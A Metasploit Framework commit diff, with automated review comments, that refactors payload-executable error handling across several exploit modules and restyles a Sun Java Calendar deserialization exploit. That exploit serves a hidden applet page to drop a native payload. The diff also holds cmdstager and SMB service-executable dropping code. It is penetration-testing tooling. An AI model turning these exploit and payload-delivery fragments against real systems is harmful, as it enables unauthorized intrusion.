
Land #6331, ensure generic payloads raise correct exceptions on failure

Brent Cook 2015-12-23 15:43:12 -06:00
commit e4f9594646
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
16 changed files with 113 additions and 132 deletions


@ -47,6 +47,15 @@ module Exploit::EXE
exe
end
# Returns an executable.
#
# @param opts [Hash]
# @option opts [String] :code Payload
# @option opts [Array] :arch Architecture
# @option opts [Msf::Module::PlatformList] :platform
# @raise [Msf::NoCompatiblePayloadError] When #genereate_payload_exe fails to generate a payload.
# @return [String]
def generate_payload_exe(opts = {})
return get_custom_exe unless datastore['EXE::Custom'].to_s.strip.empty?
return get_eicar_exe if datastore['EXE::EICAR']
@ -68,6 +77,11 @@ module Exploit::EXE
end
exe = Msf::Util::EXE.to_executable(framework, opts[:arch], opts[:platform], pl, opts)
unless exe
raise Msf::NoCompatiblePayloadError, "Failed to generate an executable payload due to an invalid platform or arch."
end
exe_post_generation(opts)
exe
end
@ -150,14 +164,42 @@ protected
:sub_method => datastore['EXE::OldMethod']
})
# Prefer the target's platform/architecture information, but use
# the module's if no target specific information exists
opts[:platform] ||= payload_instance.platform if self.respond_to? :payload_instance
opts[:platform] ||= target_platform if self.respond_to? :target_platform
opts[:platform] ||= platform if self.respond_to? :platform
opts[:arch] ||= payload_instance.arch if self.respond_to? :payload_instance
opts[:arch] ||= target_arch if self.respond_to? :target_arch
opts[:arch] ||= arch if self.respond_to? :arch
# This part is kind of tricky so we need to explain the logic behind the following load order.
# First off, platform can be seen from different sources:
#
# 1. From the opts argument. For example: When you are using generate_payload_exe, and you want
# to set a specific platform. This is the most explicit. So we check first.
#
# 2. From the metadata of a payload module. Normally, a payload module should include the platform
# information, with the exception of some generic payloads. For example: generic/shell_reverse_tcp.
# This is the most trusted source.
#
# 3. From the exploit module's target.
#
# 4. From the exploit module's metadata.
#
# Architecture shares the same load order.
unless opts[:platform]
if self.respond_to?(:payload_instance) && payload_instance.platform.platforms != [Msf::Module::Platform]
opts[:platform] = payload_instance.platform
elsif self.respond_to? :target_platform
opts[:platform] = target_platform
elsif self.respond_to? :platform
opts[:platform] = platform
end
end
unless opts[:arch]
if self.respond_to? :payload_instance
opts[:arch] = payload_instance.arch
elsif self.respond_to? :target_arch
$stderr.puts "target specific arch"
opts[:arch] = target_arch
elsif self.respond_to? :arch
opts[:arch] = arch
end
end
end
def exe_post_generation(opts)
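Review bot: `$stderr.puts "target specific arch"` in the `elsif self.respond_to? :target_arch` branch of the third hunk looks like a leftover debug trace; it writes directly to the process's stderr instead of going through the module's print helpers, and should be dropped before this lands (or become `vprint_status("Using target-specific arch")` if the trace is wanted). The comment above says architecture shares the platform load order, yet the arch branch takes `payload_instance.arch` unconditionally while the platform branch first rejects the generic `[Msf::Module::Platform]` value; if generic payloads can report an empty or generic arch the same guard is presumably needed there — confirm against the generic payload modules. The YARD `@raise` tag added in the first hunk also misspells the method: `#genereate_payload_exe` should read `#generate_payload_exe`. The method the third hunk modifies starts outside the hunk.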


@ -95,10 +95,6 @@ class Metasploit4 < Msf::Exploit::Remote
# Generate payload
@pl = generate_payload_exe
if @pl.nil?
fail_with(Failure::BadConfig, 'Please select a native bsd payload')
end
# Start the server and use primer to trigger fetching and running of the payload
begin
Timeout.timeout(datastore['HTTPDELAY']) { super }


@ -48,9 +48,6 @@ class Metasploit4 < Msf::Exploit::Local
def setup
@pl = generate_payload_exe
if @pl.nil?
fail_with(Failure::BadConfig, 'Please select a native bsd payload')
end
super
end


@ -113,9 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
@pl = generate_payload_exe
if @pl.blank?
fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF, select a native payload")
end
@payload_url = ""
if datastore['EXTURL'].blank?


@ -111,14 +111,6 @@ class Metasploit4 < Msf::Exploit::Remote
end
def exploit
# Cannot use generic/shell_reverse_tcp inside an elf
# Checking before proceeds
if generate_payload_exe.blank?
fail_with(Failure::BadConfig,
"#{peer} - Failed to store payload inside executable, " +
"please select a native payload")
end
execute_cmdstager(:linemax => 200, :nodelete => true)
end


@ -123,10 +123,6 @@ class Metasploit3 < Msf::Exploit::Remote
@payload_url = ''
@dropped_elf = rand_text_alpha(rand(5) + 3)
if @pl.blank?
fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF, select a native payload")
end
if datastore['EXTURL'].blank?
begin
Timeout.timeout(datastore['HTTPDELAY']) { super }


@ -83,9 +83,6 @@ class Metasploit4 < Msf::Exploit::Local
# Cannot use generic/shell_reverse_tcp inside an elf
# Checking before proceeds
pl = generate_payload_exe
if pl.blank?
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Failed to store payload inside executable, please select a native payload")
end
exe_file = "#{datastore['WritableDir']}/#{rand_text_alpha(3 + rand(5))}.elf"


@ -138,13 +138,8 @@ class Metasploit3 < Msf::Exploit::Remote
# NOTE: The EXE mixin automagically handles detection of arch/platform
data = generate_payload_exe
if data
print_status("Generated executable to drop (#{data.length} bytes)." )
data = Rex::Text.to_hex( data, prefix="" )
else
print_error("Failed to generate the executable." )
return
end
print_status("Generated executable to drop (#{data.length} bytes)." )
data = Rex::Text.to_hex( data, prefix="" )
end


@ -13,12 +13,12 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::EXE
# Superceded by java_atomicreferencearray
#include Msf::Exploit::Remote::BrowserAutopwn
#autopwn_info({ :javascript => false })
# include Msf::Exploit::Remote::BrowserAutopwn
# autopwn_info({ :javascript => false })
def initialize( info = {} )
super( update_info( info,
def initialize(info = {})
super(
update_info(info,
'Name' => 'Sun Java Calendar Deserialization Privilege Escalation',
'Description' => %q{
This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM.
@ -39,74 +39,73 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'URL', 'http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html' ],
[ 'URL', 'http://blog.cr0.org/2009/05/write-once-own-everyone.html' ]
],
'Platform' => %w{ linux osx solaris win },
'Platform' => %w(linux osx solaris win),
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)',
{
'Platform' => ['java'],
'Arch' => ARCH_JAVA,
'Arch' => ARCH_JAVA
}
],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
'Arch' => ARCH_X86
}
],
[ 'Mac OS X PPC (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
'Arch' => ARCH_PPC
}
],
[ 'Mac OS X x86 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
'Arch' => ARCH_X86
}
],
[ 'Linux x86 (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Arch' => ARCH_X86
}
],
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 03 2008'
))
)
)
end
def exploit
# load the static jar file
path = File.join( Msf::Config.data_directory, "exploits", "CVE-2008-5353.jar" )
fd = File.open( path, "rb" )
path = File.join(Msf::Config.data_directory, "exploits", "CVE-2008-5353.jar")
fd = File.open(path, "rb")
@jar_data = fd.read(fd.stat.size)
fd.close
super
end
def on_request_uri( cli, request )
def on_request_uri(cli, request)
data = nil
host = nil
port = nil
if not request.uri.match(/\.jar$/i)
if not request.uri.match(/\/$/)
send_redirect( cli, get_resource() + '/', '')
if !request.uri.match(/\.jar$/i)
if !request.uri.match(/\/$/)
send_redirect(cli, get_resource + '/', '')
return
end
print_status("#{self.name} handling request")
print_status("#{name} handling request")
payload = regenerate_payload( cli )
if not payload
print_error( "Failed to generate the payload." )
payload = regenerate_payload(cli)
if !payload
print_error("Failed to generate the payload.")
return
end
@ -122,10 +121,10 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Payload will be a Java bind shell")
end
if jar
print_status( "Generated jar to drop (#{jar.length} bytes)." )
jar = Rex::Text.to_hex( jar, prefix="" )
print_status("Generated jar to drop (#{jar.length} bytes).")
jar = Rex::Text.to_hex(jar, prefix = "")
else
print_error( "Failed to generate the executable." )
print_error("Failed to generate the executable.")
return
end
else
@ -133,27 +132,22 @@ class Metasploit3 < Msf::Exploit::Remote
# NOTE: The EXE mixin automagically handles detection of arch/platform
data = generate_payload_exe
if data
print_status( "Generated executable to drop (#{data.length} bytes)." )
data = Rex::Text.to_hex( data, prefix="" )
else
print_error( "Failed to generate the executable." )
return
end
print_status("Generated executable to drop (#{data.length} bytes).")
data = Rex::Text.to_hex(data, prefix = "")
end
send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } )
send_response_html(cli, generate_html(data, jar, host, port), 'Content-Type' => 'text/html')
return
end
print_status( "Sending Applet.jar" )
send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } )
print_status("Sending Applet.jar")
send_response(cli, generate_jar, 'Content-Type' => "application/octet-stream")
handler( cli )
handler(cli)
end
def generate_html( data, jar, host, port )
def generate_html(data, jar, host, port)
html = "<html><head><title>Loading, Please Wait...</title></head>"
html += "<body><center><p>Loading, Please Wait...</p></center>"
html += "<applet archive=\"Applet.jar\" code=\"msf.x.AppletX.class\" width=\"1\" height=\"1\">"
@ -162,11 +156,10 @@ class Metasploit3 < Msf::Exploit::Remote
html += "<param name=\"lhost\" value=\"#{host}\"/>" if host
html += "<param name=\"lport\" value=\"#{port}\"/>" if port
html += "</applet></body></html>"
return html
html
end
def generate_jar()
return @jar_data
def generate_jar
@jar_data
end
end
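Review bot: The restyled `exploit` still reads the jar with `fd = File.open(path, "rb")`, `fd.read(fd.stat.size)` and `fd.close` with no `ensure`, so an exception from the read leaks the handle; since these lines are being touched anyway, the three can collapse to `@jar_data = File.binread(path)`. The reformatted `Rex::Text.to_hex(jar, prefix = "")` in `on_request_uri` (and the `data` equivalent in the following hunk) still assigns a throwaway local named `prefix` inside the argument list — the value is passed positionally, so `Rex::Text.to_hex(jar, "")` expresses the same call without the misleading assignment. The new `if !request.uri.match(...)` guards would read more idiomatically as `unless request.uri.match(...)`, which is what the rest of the reformat seems to be aiming for.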


@ -137,13 +137,8 @@ class Metasploit3 < Msf::Exploit::Remote
# NOTE: The EXE mixin automagically handles detection of arch/platform
data = generate_payload_exe
if data
print_status("Generated executable to drop (#{data.length} bytes)." )
data = Rex::Text.to_hex( data, prefix="" )
else
print_error("Failed to generate the executable." )
return
end
print_status("Generated executable to drop (#{data.length} bytes)." )
data = Rex::Text.to_hex( data, prefix="" )
end


@ -99,12 +99,6 @@ class Metasploit4 < Msf::Exploit::Remote
end
def exploit
# Cannot use generic/shell_reverse_tcp inside an elf
# Checking before proceeds
if generate_payload_exe.blank?
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Failed to store payload inside executable, please select a native payload")
end
execute_cmdstager(linemax: 500)
handler
end


@ -99,12 +99,6 @@ class Metasploit4 < Msf::Exploit::Remote
end
def exploit
# Cannot use generic/shell_reverse_tcp inside an elf
# Checking before proceeds
if generate_payload_exe.blank?
fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
end
execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'], :nodelete => true)
# A last chance after the cmdstager


@ -120,9 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote
#Set up generic values.
payload_exe = rand_text_alphanumeric(4 + rand(4))
pl_exe = generate_payload_exe
if pl_exe.nil?
fail_with(Failure::BadConfig, "#{peer} - Failed to generate an EXE payload, please select a correct payload")
end
append = false
#Now arch specific...
case target['Platform']


@ -129,16 +129,6 @@ class Metasploit3 < Msf::Exploit::Remote
vprint_status("Sent command #{cmd}")
end
#
# generate_payload_exe doesn't respect module's platform unless it's Windows, or the user
# manually sets one. This method is a temp work-around.
#
def check_generate_payload_exe
if generate_payload_exe.nil?
fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF. Please manually set a payload.")
end
end
def exploit
# Handle single command shot
@ -154,8 +144,6 @@ class Metasploit3 < Msf::Exploit::Remote
return
end
check_generate_payload_exe
# Handle payload upload using CmdStager mixin
execute_cmdstager({:flavor => :printf})
end


@ -204,10 +204,13 @@ class Metasploit3 < Msf::Exploit::Remote
end
exe = ''
opts = { :servicename => servicename }
exe = generate_payload_exe_service(opts)
begin
exe = generate_payload_exe_service(opts)
fd << exe
fd.close
fd << exe
ensure
fd.close
end
if subfolder
print_status("Created \\#{fileprefix}\\#(unknown)...")
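Review bot: The `exe = ''` initializer on the line above the new `begin` is now dead, since `exe` is only assigned inside the block just before `fd << exe`; the same applies to the next file section, which ends up initializing `exe = ''` both before and inside its `begin`. The two sections also handle the cleanup differently — `fd.close` here versus `fd.close if fd` there — even though in both `fd` is assigned before the `begin` is entered, so the guard only matters if the remote open can return nil; pick one form and use it in both. If `fd << exe` itself raises, a second failure from `close` inside `ensure` will replace the original exception, which is worth keeping in mind when reading the resulting error. The enclosing method starts outside the hunk in both sections.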


@ -140,18 +140,21 @@ class Metasploit3 < Msf::Exploit::Remote
fd = rclient.open("\\#(unknown)", 'rwct')
exe = ''
opts = {
:servicename => servicename,
:code => code.encoded
}
if (datastore['PAYLOAD'].include? 'x64')
opts.merge!({ :arch => ARCH_X64 })
end
exe = generate_payload_exe_service(opts)
begin
exe = ''
opts = {
:servicename => servicename,
:code => code.encoded
}
if (datastore['PAYLOAD'].include? 'x64')
opts.merge!({ :arch => ARCH_X64 })
end
exe = generate_payload_exe_service(opts)
fd << exe
fd.close
fd << exe
ensure
fd.close if fd
end
print_status("Created \\#(unknown)...")